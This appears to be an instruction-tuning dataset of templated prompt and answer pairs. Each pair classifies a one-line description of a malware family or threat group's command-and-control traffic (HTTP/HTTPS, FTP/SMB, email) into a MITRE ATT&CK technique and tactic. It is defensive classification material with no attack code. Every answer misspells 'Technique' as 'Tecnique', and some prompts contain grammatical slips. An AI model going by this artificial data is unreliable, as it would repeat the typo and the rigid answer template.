+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: P.A.S. Webshell can issue commands via HTTP POST.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PLEAD has used HTTP for communications with command and control (C2) servers.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWERTON has used HTTP/HTTPS for C2 traffic.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWRUNER can use HTTP for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PULSECHECK can check HTTP request headers for a specific backdoor key and if found will output the result of the command in the variable `HTTP_X_CMD.`,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PUNCHBUGGY enables remote interaction and can obtain additional code over HTTPS GET and POST requests.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pandora can communicate over HTTP.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PcShare has used HTTP for C2 communication.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Peppy can use HTTP to communicate with C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PinchDuke transfers files from the compromised host via HTTP or HTTPS to a C2 server.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A PingPull variant can communicate with its C2 servers by using HTTPS.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PlugX can be configured to use HTTP for command and control.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoetRAT has used HTTP and HTTPs for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PolyglotDuke has has used HTTP GET requests in C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pony has sent collected information to the C2 via HTTP POST request.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoshC2 can use protocols like HTTP/HTTPS for command and control traffic.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowGoop can send HTTP GET requests to malicious servers.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerShower has sent HTTP GET and POST requests to C2 servers to send information and receive instructions.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Proxysvc uses HTTP over SSL to communicate commands with the control server.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Psylo uses HTTPS for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pteranodon can use HTTP for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pupy can communicate over HTTP for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QUADAGENT uses HTTPS and HTTP for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QUIETCANARY can use HTTPS for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot has the ability to use HTTP and HTTPS in communication with C2 servers.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QuietSieve can use HTTPS in C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RATANKBA uses HTTP/HTTPS for command and control communication.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RCSession can use HTTP in C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RDAT can use HTTP communications for C2, as well as using the WinHTTP library to make requests to the Exchange Web Services API.","Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: REvil has used HTTP and HTTPS in communication with C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RGDoor uses HTTP for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT12 has used RIPTIDE, a RAT that uses HTTP to communicate.","Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ROKRAT can use HTTP and HTTPS for command and control communication.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM has initiated connections to external domains using HTTPS.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RainyDay can use HTTP in C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ramsay has used HTTP for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Some Reaver variants use HTTP for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RedLeaves can communicate to its C2 over HTTP and HTTPS if directed.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Regin malware platform supports many standard protocols, including HTTP and HTTPS.","Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remexi uses BITSAdmin to communicate with the C2 server over HTTP.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remsec is capable of using HTTP and HTTPS for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rising Sun has used HTTP and HTTPS for command and control.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: S-Type uses HTTP for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SLIGHTPULSE has the ability to process HTTP GET requests as a normal web server and to insert logic that will read or write files or execute commands in response to HTTP POST requests.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SLOTHFULMEDIA has used HTTP and HTTPS for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SMOKEDHAM has communicated with its C2 servers via HTTPS and HTTP POST requests.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SNUGRIDE communicates with its C2 server over HTTP.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: STARWHALE has the ability to contact actor-controlled C2 servers via HTTP.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: STEADYPULSE can parse web requests made to a targeted server to determine the next stage of execution.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A SUGARDUMP variant has used HTTP for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNBURST communicated via HTTP GET or HTTP POST requests to third party servers for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUPERNOVA had to receive an HTTP GET request containing a specific set of parameters in order to execute.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SVCReady can communicate with its C2 servers via HTTP.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Saint Bot has used HTTP for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sakula uses HTTP for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Samurai can use a .NET HTTPListener class to receive and handle HTTP POST requests.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SeaDuke uses HTTP and HTTPS for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Seasalt uses HTTP for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ServHelper uses HTTP for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShadowPad communicates over HTTP to retrieve a string that is decoded into a C2 server URL.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Shamoon has used HTTP for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Shark has the ability to use HTTP in C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShimRat communicated over HTTP and HTTPS with C2 servers.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShimRatReporter communicated over HTTP with preconfigured C2 servers.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sibot communicated with its C2 server via HTTP GET requests.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SideTwist has used HTTP GET and POST requests over port 443 for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sliver has the ability to support C2 communications over HTTP/S.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Small Sieve can contact actor-controlled C2 servers by using the Telegram API over HTTPS.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Smoke Loader uses HTTP for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SoreFang can use HTTP in C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Spark has used HTTP POST requests to communicate with its C2 server to receive commands.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SpeakUp uses POST and GET requests over HTTP to communicate with its main C&C server.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Squirrelwaffle has used HTTP POST requests for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StrongPity can use HTTP and HTTPS in C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet uses HTTP to communicate with a command and control server.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sys10 uses HTTP for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TSCookie can multiple protocols including HTTP and HTTPS in communication with command and control (C2) servers.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Taidoor has used HTTP GET and POST requests for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ThiefQuest uploads files via unencrypted HTTP.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TinyTurla can use HTTPS in C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tomiris can use HTTP to establish C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Torisma can use HTTP and HTTPS for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrailBlazer has used HTTP requests for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot uses HTTPS to communicate with its C2 servers, to get malware updates, modules that perform most of the malware logic and various configuration files.","Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Trojan.Karagany can communicate with C2 via HTTP POST requests.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turian has the ability to use HTTP for its C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: UBoatRAT has used HTTP for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: UPPERCUT has used HTTP for C2, including sending error codes in Cookie headers.","Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Uroburos can use a custom HTTP-based protocol for large data communications that can blend with normal network traffic by riding on top of standard HTTP.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ursnif has used HTTPS for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: VBShower has attempted to obtain a VBS script from command and control (C2) nodes over HTTP.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: VERMIN uses HTTP for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Valak has used HTTP in communications with C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: VaporRage can use HTTP to download shellcode from compromised websites.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Vasport creates a backdoor by making a connection using a HTTP POST.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WIREFIRE can respond to specific HTTP `POST` requests to `/api/v1/cav/client/visits`.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WellMess can use HTTP and HTTPS in C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WhisperGate can make an HTTPS connection to download additional files.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WinMM uses HTTP for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WindTail has the ability to use HTTP for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Winnti for Linux has used HTTP in outbound communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Winnti for Windows has the ability to use encapsulated HTTP/S in C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Woody RAT can communicate with its C2 server using HTTP requests.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Xbash uses HTTP for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: YAHOYAH uses HTTP for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZLib communicates over HTTP for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zebrocy uses HTTP for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZeroT has used HTTP for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zeus Panda uses HTTP for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxShell has used HTTP for C2 connections.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: down_new has the ability to use HTTP in C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: httpclient uses HTTP for command and control.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: metaMain can use HTTP for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: njRAT has used HTTP for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: pngdowner uses HTTP for command and control.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: xCaon has communicated with the C2 server by sending POST requests over HTTP.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Honeybee, the threat actors had the ability to use FTP for C2.","Tecnique: T1071.002 Application Layer Protocol: File Transfer Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 used exploit payloads that initiate download via ftp.,"Tecnique: T1071.002 Application Layer Protocol: File Transfer Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has used SMB for C2.,"Tecnique: T1071.002 Application Layer Protocol: File Transfer Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has used FTP to download additional malware to the target machine.,"Tecnique: T1071.002 Application Layer Protocol: File Transfer Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SilverTerrier uses FTP for C2 communications.,"Tecnique: T1071.002 Application Layer Protocol: File Transfer Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Attor has used FTP protocol for C2 communication.,"Tecnique: T1071.002 Application Layer Protocol: File Transfer Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADHATCH can emulate an FTP server to connect to actor-controlled C2 servers.,"Tecnique: T1071.002 Application Layer Protocol: File Transfer Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CARROTBALL has the ability to use FTP in C2 communications.,"Tecnique: T1071.002 Application Layer Protocol: File Transfer Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can conduct peer-to-peer communication over Windows named pipes encapsulated in the SMB protocol. All protocols use their standard assigned ports.,"Tecnique: T1071.002 Application Layer Protocol: File Transfer Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Disco can use SMB to transfer files.,"Tecnique: T1071.002 Application Layer Protocol: File Transfer Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JPIN can communicate over FTP.,"Tecnique: T1071.002 Application Layer Protocol: File Transfer Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kazuar uses FTP and FTPS to communicate with the C2 server.,"Tecnique: T1071.002 Application Layer Protocol: File Transfer Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete uses FTP for Command & Control.,"Tecnique: T1071.002 Application Layer Protocol: File Transfer Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mythic supports SMB-based peer-to-peer C2 profiles.,"Tecnique: T1071.002 Application Layer Protocol: File Transfer Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NOKKI has used FTP for C2 communications.,"Tecnique: T1071.002 Application Layer Protocol: File Transfer Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoetRAT has used FTP for C2 communications.,"Tecnique: T1071.002 Application Layer Protocol: File Transfer Protocols, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Regin malware platform supports many standard protocols, including SMB.","Tecnique: T1071.002 Application Layer Protocol: File Transfer Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SYSCON has the ability to use FTP in C2 communications.,"Tecnique: T1071.002 Application Layer Protocol: File Transfer Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShadowPad has used FTP for C2 communications.,"Tecnique: T1071.002 Application Layer Protocol: File Transfer Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SharpDisco has the ability to transfer data between SMB shares.,"Tecnique: T1071.002 Application Layer Protocol: File Transfer Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: XAgentOSX contains the ftpUpload function to use the FTPManager:uploadFile method to upload files from the target system.,"Tecnique: T1071.002 Application Layer Protocol: File Transfer Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxShell has used FTP for C2 connections.,"Tecnique: T1071.002 Application Layer Protocol: File Transfer Protocols, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has used IMAP, POP3, and SMTP for a communication channel in various implants, including using self-registered Google Mail accounts and later compromised email servers of its victims.","Tecnique: T1071.003 Application Layer Protocol: Mail Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has used email for C2 via an Office macro.,"Tecnique: T1071.003 Application Layer Protocol: Mail Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has used e-mail to send exfiltrated data to C2 servers.,"Tecnique: T1071.003 Application Layer Protocol: Mail Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SilverTerrier uses SMTP for C2 communications.,"Tecnique: T1071.003 Application Layer Protocol: Mail Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla has used multiple backdoors which communicate with a C2 server via email attachments.,"Tecnique: T1071.003 Application Layer Protocol: Mail Protocols, Tactic: TA0011 Command and Control"
